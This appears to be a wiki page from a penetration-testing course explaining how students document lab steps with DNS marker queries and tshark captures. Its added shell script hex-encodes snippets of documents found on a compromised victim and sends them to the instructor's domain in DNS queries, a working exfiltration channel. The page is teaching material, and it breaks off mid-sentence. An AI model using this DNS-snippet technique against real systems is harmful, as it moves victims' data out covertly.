
Documentation for professionals packet

Dean Bushmiller edited this page Nov 9, 2022 · 1 revision

My initial thought on using my professional documentation technique in the classroom was: students become professionals, so set expectations high and they will be great. My second thought was that it is too much work for students. You choose.

Most penetration testing documentation tools do not consider the forensic approach; I do.

When I present a report to my client, it is always encrypted, anonymized, and easy to back up with forensic data. Forensic is a fancy way of saying we do this work scientifically, and somebody else can reproduce our results independent of our actions. All reports loop through each scope component. They sound like this: "We did this, the result was this, the proof is this, here is the level of risk to your organization."

How - overview

  1. Start with capturing all packets from your computer.
  2. Ensure capture is decrypted if possible.
  3. Record / list the steps taken on any victim when you pivot (unless this is a red-team operation: no time for it, and it gets you detected).
  4. Support recording by having independent log tool.

We use tshark (Wireshark), ping, and AWS DNS logs.

I ping my DNS with a query that will fail. The query itself is documentation of the step I take (and in some cases proof of possible exfiltration).

Hopefully you will practice this in your labs with me.

You can ping a DNS name. It does not have to be an IP address; it can be a fully qualified domain name, and that name does not have to resolve. In this case it is better that it doesn't resolve: the failed lookup still reaches the authoritative server and is recorded as a log entry from a particular IP address. (The address logged is whichever host sent the query to the authoritative server: your own machine if it queries directly, otherwise the recursive resolver it uses.)

When you compromise a victim and you have a shell on it, send a ping to your DNS server while you are there to prove you were there. Further, if the client has asked you to find a sensitive document, you can prove you found it by taking a small snippet of it and passing it in the query so it lands in the DNS log. All of the activity initiated from your computer will be logged in Wireshark; if an action does not originate from your computer, send a marker query right before it so the capture still shows the sequence.

How details:

When you are building out your attacker workstation you only have to do this setup once (save your base image with these settings). When you are on a temporary lab machine you have to do it over and over again (good practice; work out your process).

One step at a time:

  • ping -c 1 db07.mod02.lab1.task1.step0.clickalab.com

We start by pinging the instructor with a properly formatted failing DNS query. These queries must be unique, valid, and understandable. Students are doing the same labs, we might be doing them on different machines, and we might not have the official lab set up.

We need a good convention that works for all students.

A proper DNS query for an A record, with subdomains.

My syntax is the following: FLinitials##.mod##.lab#.task#.step#.clickalab.com

I need your initials plus 2 digits that never change. Dean Bushmiller becomes db07. On the main page there is a folder with all the lab overviews: https://github.com/deanbushmiller/CEH-bootcamp/tree/master/LAB-Overview-PDFs Each PDF is a module. Your first module is 02. Do not use dashes or underscores; the name must be a valid hostname, see https://datatracker.ietf.org/doc/html/rfc3490

  • db07.mod02.... Lab numbers are a single digit; task numbers are a single digit
  • db07.mod02.lab1.task1

STEPs: if you are doing an ECC lab, those steps match my video. Some steps do not produce packets or are insignificant; you choose. But when you start a lab you are at step 0.

  • db07.mod02.lab1.task1.step0.clickalab.com
  • Above is my unique, valid, and understandable DNS query: it has no record, it generates a packet, and it will be logged.

As you march through your labs, change the digits (except your name##). I know it is you, I can see where it came from, and you can add more labels to the LEFT SIDE as long as the name still follows the RFC above.

Ping your FQDN with a packet count of 1; depending on your OS the switch differs (-c 1 on Linux and macOS, -n 1 on Windows).

  • up-arrow: as long as you keep your command prompt open, you can use the up-arrow to retrieve the previous ping and change the numbers.
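As an added example (my shell script, not the course's own code), here is the naming convention above, the snippet-in-a-query idea from the "How - overview" section, and the OS-dependent ping switch in one POSIX sh file. Assumed from the page: the clickalab.com domain, the db07 example, and the "no dashes or underscores" rule; everything else (the function names, the --demo flag, the CONFIDENTIAL sample text) is mine.

```sh
#!/bin/sh
# Added example, not from the course page: build, check and send a clickalab.com marker query.
# Assumes POSIX sh with od, tr, uname and ping, and the naming convention from the page.

DOMAIN="clickalab.com"

# Build the marker name: initials## . mod## . lab# . task# . step# . clickalab.com
# The caller passes the module as written in the labs ("02"), so no numeric formatting.
marker_name() {  # initials## mod## lab# task# step#
  printf '%s.mod%s.lab%s.task%s.step%s.%s' "$1" "$2" "$3" "$4" "$5" "$DOMAIN"
}

# Check a name against the course convention, which is stricter than the hostname RFCs:
# every label 1-63 characters of letters and digits only (the RFC also allows interior
# hyphens; the page says not to use them), whole name at most 253 characters.
# Returns 0 when valid, 1 otherwise.
valid_fqdn() {  # fqdn
  name="$1"
  [ ${#name} -le 253 ] || return 1
  old_ifs=$IFS; IFS=.; set -f      # split on dots, no pathname expansion
  set -- $name
  set +f; IFS=$old_ifs
  for label in "$@"; do
    case "$label" in
      '') return 1 ;;                # empty label ("a..b")
      *[!A-Za-z0-9]*) return 1 ;;    # dash, underscore, space, anything else
    esac
    [ ${#label} -le 63 ] || return 1
  done
  return 0
}

# Hex-encode the first N bytes of stdin as one label, so a snippet of a document found
# on the victim can ride in the query (proof of access and of a possible exfiltration path).
# N <= 31 keeps the label under the 63-character limit (two hex characters per byte).
snippet_label() {  # N
  head -c "$1" | od -An -tx1 -v | tr -d ' \n'
}

# Put the snippet label on the LEFT of a step marker: <hex>.<marker>
snippet_marker() {  # N marker
  printf '%s.%s' "$(snippet_label "$1")" "$2"
}

# Send one query. Resolution is expected to fail, so no ICMP ever leaves the box;
# the only packet on the wire is the DNS query, which is exactly what gets logged.
mark_step() {  # fqdn
  valid_fqdn "$1" || { echo "invalid marker, not sent: $1" >&2; return 1; }
  case "$(uname -s)" in
    MINGW*|MSYS*|CYGWIN*) ping -n 1 "$1" || true ;;   # Windows ping (e.g. under Git Bash)
    *)                    ping -c 1 "$1" || true ;;   # Linux and macOS
  esac
}

# Usage, guarded so the file can be sourced for its functions without sending anything:
if [ "${1:-}" = "--demo" ]; then
  m=$(marker_name db07 02 1 1 0)      # db07.mod02.lab1.task1.step0.clickalab.com
  mark_step "$m"
  # constructed sample text standing in for a document found on the victim
  mark_step "$(printf 'CONFIDENTIAL' | snippet_marker 8 "$m")"
fi
```

Keep the snippet to a handful of bytes: the point is to prove access, not to move data, and the client has to have agreed to it in the scope.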

You could ping the instructor without capturing (thank you very much, it's nice to see you too). But the whole point is for you to sharpen your skills and build a process for documenting your activities. Wireshark or tshark is the tool for documentation.

PACKET CAPTURE

Do the lab packet stimulus to the victim and the pings to clickalab.com. When you are done with the task, press Ctrl-C to stop the capture (Ctrl-Z only suspends tshark; the process stays around and the file is not closed). You are stopping between tasks to get small files.

You need to reset the permissions on all the files so you can webmail them off the box:

chmod 644 *.pcapng

You need to move them to a directory where you can connect to the webmail/browser

mv *.pcapng /home/attacker/Desktop/ (your directories may vary)

Send them to yourself or me. But you might want to see deeper into the capture. TLS makes all that data unreadable ... there is another
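The capture workflow above, as an added example (my script, not the course's): one file per task, stopped with Ctrl-C, made readable and moved to the outbox, then read back to list the marker queries so you can check the capture against the instructor's DNS log before you send it. Assumed: Linux or macOS with tshark installed and capture rights on the interface; IFACE, OUTBOX (the page's /home/attacker/Desktop is the default here), the --run flag and the function names are mine.

```sh
#!/bin/sh
# Added example, not the course's own script: per-task capture around the marker queries.
# Assumes tshark is installed, the user may capture on IFACE, and OUTBOX is reachable
# from the browser session used for webmail.

IFACE="${IFACE:-eth0}"
OUTBOX="${OUTBOX:-/home/attacker/Desktop}"
DOMAIN="clickalab.com"

# One capture file per task; the file name carries the same fields as the marker queries.
capture_filename() {  # initials## mod## lab# task#
  printf '%s-mod%s-lab%s-task%s.pcapng' "$1" "$2" "$3" "$4"
}

# Capture everything this host sends and receives during the task. Stop with Ctrl-C
# when the task is done; Ctrl-Z would only suspend tshark and leave the file unfinished.
capture_task() {  # initials## mod## lab# task#
  tshark -i "$IFACE" -w "$(capture_filename "$@")"
}

# After the capture is stopped: tshark/dumpcap output is often not readable by the
# unprivileged browser user, so open the files up and move them to the outbox.
finish_task() {
  chmod 644 ./*.pcapng
  mv ./*.pcapng "$OUTBOX"/
}

# Display filter that isolates the marker queries (requests only, not resolver answers).
marker_filter() {
  printf 'dns.flags.response == 0 && dns.qry.name contains "%s"' "$DOMAIN"
}

# Timeline of markers in a finished capture: frame time, source address, queried name.
# This is the capture-side evidence that should line up with the instructor's DNS log.
marker_timeline() {  # file
  tshark -r "$1" -Y "$(marker_filter)" -T fields -e frame.time -e ip.src -e dns.qry.name
}

# Pure check: is every expected marker name present in the timeline text?
# Returns 1 and names the first missing marker on stderr.
names_present() {  # timeline_text name...
  seen="$1"; shift
  for want in "$@"; do
    case "$seen" in
      *"$want"*) ;;
      *) echo "missing marker: $want" >&2; return 1 ;;
    esac
  done
}

# Same check run against a capture file.
check_markers() {  # file name...
  file="$1"; shift
  names_present "$(marker_timeline "$file")" "$@"
}

# Usage, guarded so the file can be sourced for its functions without starting a capture:
if [ "${1:-}" = "--run" ]; then
  capture_task db07 02 1 1          # do the task, send the step pings, then Ctrl-C
  check_markers "$(capture_filename db07 02 1 1)" \
    db07.mod02.lab1.task1.step0.clickalab.com \
    db07.mod02.lab1.task1.step1.clickalab.com
  finish_task
fi
```

Run check_markers before finish_task: if a step marker is missing from the file, you still have the box and can redo the step, which is much cheaper than explaining a gap in the timeline later.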

ENCRYPTION IS IN OUR WAY

This is more on your own for advanced students: